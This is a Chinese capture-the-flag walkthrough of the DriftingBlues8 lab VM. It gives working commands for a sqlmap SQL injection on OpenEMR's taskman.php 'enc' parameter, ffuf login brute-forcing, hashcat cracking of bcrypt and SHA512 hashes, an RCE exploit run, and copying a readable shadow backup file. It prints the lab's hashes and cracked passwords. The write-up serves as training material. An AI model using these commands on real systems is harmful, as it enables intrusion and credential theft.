HackMyvm(二十)Driftingblues8系列文章持续更新
信息收集
文章目录
- 信息收集
- 漏洞利用
- 权限提升
- 总结
还是先扫个网段找IP
nmap -sP 192.168.2.0/24
继续扫下端口服务
nmap -sC -sV -p- 192.168.2.19
只开了HTTP服务
打开就是个登录页面,八成待会又要爆破了
先扫扫目录
gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.19/ -x txt,html,zip,php
扫到了很多东西,一个一个慢慢看
根据/admin.php这个页面知道了openEMR的版本是5.0.1.3
漏洞库查到了几个这个版本的漏洞,但是都需要用户名和密码才能使用,其中有一个未授权访问的漏洞,但是没找到怎么具体怎么用
那么再看看MSF里面能不能找到有关的利用模块,发现5.0.1有一个SQL注入
这里还发现了一个worldlist.txt,此处可能是要我们去爆破
漏洞利用
由于MSF的攻击速度实在是太慢了,似乎是打算直接把所有数据全部搞下来,我们直接上SQLMAP找指定的东西就好
那么可以直接上SQLMAP开冲了,在开冲之前先看看这个模块是怎么攻击的
cat /opt/metasploit-framework/embedded/framework/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
可以知道攻击的URL如下,攻击参数是enc
/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1
先测测能不能注入
sqlmap -u 'http://192.168.2.19/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc --random-agent
和预想中的一样,就是这个注入点
那么SQLMAP的攻击流程就不在这里多赘述了,直接把结果拿出来
sqlmap -u 'http://192.168.2.19/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc --random-agent -D openemr -T users_secure -C password,username --dump --batch
账号admin,密码是加密的
$2a$05$.tDgmjTxSmOz8ena6MnN3.2E049sE5jUaknc7aRqOOdQHLX61F.p.
到这里有2个思路,第一个是利用拿到的字典对admin用户进行登录爆破,第二个是对这个hash值进行爆破,我这里先说第一种,对用户进行登录爆破
这里使用到ffuf
ffuf -u "http://192.168.2.19/interface/main/main_screen.php?auth=login&site=default" \-X POST -H "Content-type: application/x-www-form-urlencoded" \-d "new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FUZZ&languageChoice=1" \-w wordlist.txt -fs 456
解释:-X 发送包的模式 -H 加head -d 要发的数据 -w 字典 FUZZ要爆破的地方 -fs 过滤数据包的大小 这里错误的数据包是456所以过滤
成功爆破出密码 .:.yarrak.:.31
下面说第二种方法使用hashcat爆破,首先值得关注的是这个是什么加密类型,这里给出hashcat官方的hash加密特征值表
ht%tps://hash%cat.net/wiki/doku.php?id=exa%mple_hashes 去掉%
最终bcrypt符合我们的条件
echo '$2a$05$.tDgmjTxSmOz8ena6MnN3.2E049sE5jUaknc7aRqOOdQHLX61F.p.'>keyhash
hashcat -m 3200 keyhash wordlist.txt
经过一会的等待,我们拿到了想要的结果,它是一个16进制,我们只要转换成字符串即可
解密出来的答案与我们爆破的一致
终于拿到了账号和密码,这个过程实在是不容易,知道了账号密码我们就可以上之前发现的EXP了,这里随便选一个任意代码执行
我这里选择49998这个python脚本的exp,参数介绍如下
构造如下payload,这里-U是默认安装路径,根据观察这里的路径位空,我们用/就可以了
python 49998.py -T 192.168.2.19 -P 80 -U / -u admin -p .:.yarrak.:.31
上线成功
没有sudo,看看suid权限
find / -user root -perm -4000 -print 2>/dev/null
也没有看到能够利用的点,那就再翻翻目录看看有收获没
当我看到/var/backups的时候,shadow.backup我们居然有读权限,我只能说这个Blues系列只能的就是从头爆破到尾
python3 -m http.server
wget http://192.168.2.19:8000/shadow.backup
这里root密码的特征是666,经过查找是SHA512crypt加密
这里我尝试了继续使用wordlist,但是没有爆破成功,那么只能用rouckyou.txt了,先爆破clapton
echo '$6$/eeR7/4JGbeM7nwc$hANgsvO09hCCMkV5HiWsjTTS7NMOZ4tm8/s4uzyZxLau2CSX7eEwjgcbfwcdvLV.XccVW5QuysP/9JBjMkdXT/'>clapton
hashcat -m 1800 clapton /root/tools/rockyou.txt
爆破成功,密码是dragonsblood
权限提升
再尝试一下root能不能成
echo '$6$sqBC8Bk02qmul3ER$kysvb1LR5uywwKRc/KQcmOMALcqd0NhHnU1Wbr9NRs9iz7WHwWqGkxKYRhadI3FWo3csX1BdQPHg33gwGVgMp.' >root
hashcat -m 1800 root /root/tools/rockyou.txt
跑了大概半个多小时,没跑出来,不是很想跑了,那就先看看clapton这个用户吧
su clapton
拿到第一个flag,同时目录下面有一个文件叫waytoroot
把这个文件弄下来反编译看看,没发现什么信息
此时我突然发现,根目录下还有一个wordlist,由于之前已经有了一个wordlist让我忽略了它,这个系列的主题就是爆破,我估计真的还是要爆破,把这个wordlist下载下来试一下
python3 -m http.server 4567
wget http://192.168.2.19:4567/wordlist.txt
hashcat -m 1800 root wordlist.txt
爆破出来了,真的不知道该说什么好····,从头到尾都在爆破,合理怀疑那个waytoroot是钓鱼的,或者是我太菜了,有知道waytoroot怎么用的欢迎分享一下,转换成字符串是这个.:.yarak.:.
拿下root
总结
总结:每次我打Blues的靶机,我都感觉我像是进入了各种爆破当中,从头到尾都在爆破,这套靶机有技巧性的地方就是找到SQL注入,拿到admin这个用户和hash,当然就算没有用到SQL注入,如果只是利用wordlist去猜测admin这个用户也能成功,然后就是接着用一个RCE的exp拿到webshell,拿到webshell之后就是无尽的爆破~
HackMyvm(二十)Driftingblues8系列文章持续更新相关推荐
- HackMyvm(二十七)Hommie,系列文章持续更新
文章目录 每日一学 信息收集 漏洞利用 权限提升 总结 每日一学 NO.7 你了解哪些中间件 Apache Nginx IIS Tomcat JBoss Weblogic 信息收集 先来扫网段 nma ...
- Hexo 博客优化之博客美化系列(持续更新)
2022-01-25 更新:博客新地址:https://www.itbob.cn/,文章距上次编辑时间较远,部分内容可能已经过时! 本文将讲述一些 Hexo 博客的美化,本文以作者 luuman 的 ...
- Hexo 博客优化之实用功能添加系列(持续更新)
2022-01-25 更新:博客新地址:https://www.itbob.cn/,文章距上次编辑时间较远,部分内容可能已经过时! 本文将讲述一些 Hexo 博客实用功能的添加,本文以作者 luuma ...
- .NET Core on K8S 学习与实践系列文章索引 (更新至20191126)
更新记录: -- 2019-11-26 增加Docker容器日志系列文章 近期在学习Kubernetes,基于之前做笔记的习惯,已经写了一部分文章,因此给自己立一个flag:完成这个<.NET ...
- .NET Core on K8S 学习与实践系列文章索引 (更新至20191116)
更新记录: -- 2019-11-16 增加Docker容器监控系列文章 // 此外,今天是11月17日,我又老了一岁,祝我自己生日快乐! 近期在学习Kubernetes,基于之前做笔记的习惯,已经写 ...
- pwn学习总结(二) —— 基础知识(持续更新)
pwn学习总结(二) -- 基础知识(持续更新) Canary PLT表&GOT表 格式化字符串漏洞 GCC编译参数 ASLR 危险函数 输入流 syscall条件 shellcode 其它 ...
- MVS文章持续更新中~
多视角立体(MVS)相关文章总结 文章目录 多视角立体(MVS)相关文章总结 前言 1.MVSNet: Depth Inference for Unstructured Multi-view Ster ...
- 【k8s系列,持续更新中】2.1 入门k8s_跑个应用看看 (且随疾风前行,身后一许流星~~)
[写在前面] 接触k8s有一段时间了,但是并没有很系统的撸一遍,总是哪个组件或者哪个出错了就去百度,知识并没有沉淀下来,所以打算写一下系列文章,本着好理解,全是大白话来搞定.如果哪里写的不好或者出错了 ...
- Android 天气APP(二十六)增加自动更新(检查版本、通知栏下载、自动安装)
上一篇:Android 天气APP(二十五)地图天气(下)嵌套滑动布局渲染天气数据 效果图 开发流程 1.开发前言 2.上传应用到分发平台 3.版本数据请求与存储 4.检查版本更新.自定义更新提示弹窗 ...
最新文章
- win32 打印机api
- undistortPoints()函数用法总结
- linux终端定时器实验报告,定时器实验报告.doc
- Genymotion 解决虚拟镜像下载速度特别慢的问题
- Understand分析Kinect SDK 1.7自带例子(C++)图集一
- html5 拍照 清晰度,html5强大的功能(一)
- 手机pdf格式怎么弄_pdf怎么转html?pdf转html技能分享给你
- python中import文件_Python导入其他文件中的.py文件 即模块
- (二)GKE上MLOps的Jenkins作业和部署
- 程序员吐槽:组里新来一个“加班狂”,可把大家害惨了
- 互换元素(swap,swap_ranges)
- U盘安装fedora 9
- 北京邮电大学计算机学院考研调剂,2020考研调剂信息:北京邮电大学计算机学院招生信息...
- selenium操作浏览器
- 微信缓存dat怎么转图片_PC微信dat文件如何转换为图片?
- 前端程序员偷懒工具:emmet语法
- Android权限申请哪些需要动态申请
- 观众网app android,观众网手机客户端(电视节目录制报名)
- 关于单元测试框架GoogleTest——参考《百度文库》、大量博客
- 树莓派使用4g上网卡上网